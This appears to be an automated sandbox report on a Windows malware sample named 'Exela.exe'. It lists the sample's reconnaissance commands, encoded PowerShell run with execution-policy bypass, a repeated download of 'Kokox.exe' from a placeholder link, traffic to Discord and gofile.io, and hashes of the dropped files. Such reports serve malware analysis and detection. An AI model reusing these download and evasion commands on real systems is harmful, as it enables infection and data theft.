C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators
C:\Windows\system32\net.exe
net user guest
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user guest
C:\Windows\system32\net.exe
net user administrator
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user administrator
C:\Windows\System32\Wbem\WMIC.exe
wmic startup get caption,command
C:\Windows\system32\tasklist.exe
tasklist /svc
C:\Windows\system32\ipconfig.exe
ipconfig /all
C:\Windows\system32\ROUTE.EXE
route print
C:\Windows\system32\ARP.EXE
arp -a
C:\Windows\system32\NETSTAT.EXE
netstat -ano
C:\Windows\system32\sc.exe
sc query type= service state= all
C:\Windows\system32\netsh.exe
netsh firewall show state
C:\Windows\system32\netsh.exe
netsh firewall show config
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\timeout.exe
timeout /t 5
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gxl5eawx\gxl5eawx.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCD52.tmp" "c:\Users\Admin\AppData\Local\Temp\gxl5eawx\CSCA2000AA099924A6D852CCA33F2F612C8.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"
C:\Windows\system32\timeout.exe
timeout /t 5
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"
C:\Windows\system32\timeout.exe
timeout /t 5
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"
C:\Windows\system32\timeout.exe
timeout /t 5
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 127.0.0.1:50065 | N/A | tcp |
| N/A | 127.0.0.1:50084 | N/A | tcp |
| N/A | 127.0.0.1:50107 | N/A | tcp |
| N/A | 127.0.0.1:50112 | N/A | tcp |
| N/A | 127.0.0.1:50114 | N/A | tcp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 162.159.135.232:443 | discord.com | tcp |
| FR | 51.75.242.210:443 | api.gofile.io | tcp |
| N/A | 127.0.0.1:50282 | N/A | tcp |
| N/A | 127.0.0.1:50284 | N/A | tcp |
| FR | 45.112.123.227:443 | store1.gofile.io | tcp |
| US | 162.159.135.232:443 | discord.com | tcp |
Files
memory/3132-0-0x0000000000F60000-0x000000000218E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Exela.exe
| MD5 | c5669d422429ecf07edc2f00821ecd93 |
| SHA1 | 8da6ff8a15bd667719a72aa3ac5af33fb1c640c3 |
| SHA256 | 3ade121ba195ca8e6e37aaeb84152e735b89cdd68f0a14b787c4d0d3f7351e00 |
| SHA512 | d686372bacc27848c093012b64791a956cb3cd3bc915b65949d0cf4056e0317763d4dd3abf3b75ee55c968ee43e821a17796999a7978dde85d9e9133610a1253 |
C:\Users\Admin\AppData\Local\Temp\no defender.exe
| MD5 | c80d2a00b97cf55170b221f8a8f65e81 |
| SHA1 | a03c17751d8db91e1e66460093855dabbcfcc04b |
| SHA256 | af69ac0bc29db1b5bc7957411de2f49469525e32dbf76932d93489021f2bfe85 |
| SHA512 | 48b54cfe518b77a83957f7e1edad3ea09bc18f79ad24158b79345f1d29810e805340e74cc5b33effb081959502b7ea305fe1e0035450e2ecd03e6c5307b92879 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log
| MD5 | 2cbbb74b7da1f720b48ed31085cbd5b8 |
| SHA1 | 79caa9a3ea8abe1b9c4326c3633da64a5f724964 |
| SHA256 | e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3 |
| SHA512 | ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9 |
C:\Users\Admin\AppData\Local\Temp\A066.tmp\A067.tmp\A068.bat
| MD5 | bffa0b357688d06c9f66c79a5d091f8b |
| SHA1 | bc20d3a70777c646a86e5c4b98f3a038f0821106 |
| SHA256 | d2e461a8175a5a964e2012329e72b339c43386e9ded1bb742fd7233400a9c9df |
| SHA512 | 36f23e89943ea250ee71ee832e55e3eba396ede87689e6f0fce478118cdf46ef4b06f068c2ca24e128a3cfc242119794411dc930e3d67434598410fc50cce903 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_40x2aptv.km3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\_MEI2482\ucrtbase.dll
| MD5 | 3b337c2d41069b0a1e43e30f891c3813 |
| SHA1 | ebee2827b5cb153cbbb51c9718da1549fa80fc5c |
| SHA256 | c04daeba7e7c4b711d33993ab4c51a2e087f98f4211aea0dcb3a216656ba0ab7 |
| SHA512 | fdb3012a71221447b35757ed2bdca6ed1f8833b2f81d03aabebd2cd7780a33a9c3d816535d03c5c3edd5aaf11d91156842b380e2a63135e3c7f87193ad211499 |
C:\Users\Admin\AppData\Local\Temp\_MEI2482\python311.dll
| MD5 | db09c9bbec6134db1766d369c339a0a1 |
| SHA1 | c156d9f2d0e80b4cf41794cd9b8b1e8a352e0a0b |
| SHA256 | b1aac1e461174bbae952434e4dac092590d72b9832a04457c94bd9bb7ee8ad79 |
| SHA512 | 653a7fff6a2b6bffb9ea2c0b72ddb83c9c53d555e798eea47101b0d932358180a01af2b9dab9c27723057439c1eaffb8d84b9b41f6f9cd1c3c934f1794104d45 |
C:\Users\Admin\AppData\Local\Temp\_MEI2482\VCRUNTIME140.dll
| MD5 | f12681a472b9dd04a812e16096514974 |
| SHA1 | 6fd102eb3e0b0e6eef08118d71f28702d1a9067c |
| SHA256 | d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8 |
| SHA512 | 7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2 |
memory/952-128-0x00007FFF227A0000-0x00007FFF22D88000-memory.dmp
memory/2224-122-0x000002500D090000-0x000002500D0B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI2482\python3.dll
| MD5 | 34e49bb1dfddf6037f0001d9aefe7d61 |
| SHA1 | a25a39dca11cdc195c9ecd49e95657a3e4fe3215 |
| SHA256 | 4055d1b9e553b78c244143ab6b48151604003b39a9bf54879dee9175455c1281 |
| SHA512 | edb715654baaf499cf788bcacd5657adcf9f20b37b02671abe71bda334629344415ed3a7e95cb51164e66a7aa3ed4bf84acb05649ccd55e3f64036f3178b7856 |
C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-core-interlocked-l1-1-0.dll
| MD5 | ee5bb5fc7b94b7413b9f4ade5dcd404e |
| SHA1 | 6d615205f7d44cf0a77e7d943d33a2915bd636d8 |
| SHA256 | 22cf7040d9cb3dc79d941a6bbe4cebd5beaa1355d6e424843e6970404281e61e |
| SHA512 | 954d5b6a51334eb1a602aa35f29a2c84a025438784f77d5f4c96d465cd5cf1229dd55edf1c3faa14edae5f25ed74dbc175a143d8ed93ee24f98c0fe678569031 |
memory/952-181-0x00007FFF3D3D0000-0x00007FFF3D3DF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI2482\select.pyd
| MD5 | c39459806c712b3b3242f8376218c1e1 |
| SHA1 | 85d254fb6cc5d6ed20a04026bff1158c8fd0a530 |
| SHA256 | 7cbd4339285d145b422afa280cee685258bc659806be9cf8b334805bc45b29c9 |
| SHA512 | b727c6d1cd451d658e174161135d3be48d7efda21c775b8145bc527a54d6592bfc50919276c6498d2e2233ac1524c1699f59f0f467cc6e43e5b5e9558c87f49d |
C:\Users\Admin\AppData\Local\Temp\_MEI2482\pyexpat.pyd
| MD5 | fe0e32bfe3764ed5321454e1a01c81ec |
| SHA1 | 7690690df0a73bdcc54f0f04b674fc8a9a8f45fb |
| SHA256 | b399bff10812e9ea2c9800f74cb0e5002f9d9379baf1a3cef9d438caca35dc92 |
| SHA512 | d1777f9e684a9e4174e18651e6d921ae11757ecdbeb4ee678c6a28e0903a4b9ab9f6e1419670b4d428ee20f86c7d424177ed9daf4365cf2ee376fcd065c1c92d |
C:\Users\Admin\AppData\Local\Temp\_MEI2482\libssl-1_1.dll
| MD5 | 6cd33578bc5629930329ca3303f0fae1 |
| SHA1 | f2f8e3248a72f98d27f0cfa0010e32175a18487f |
| SHA256 | 4150ee603ad2da7a6cb6a895cb5bd928e3a99af7e73c604de1fc224e0809fdb0 |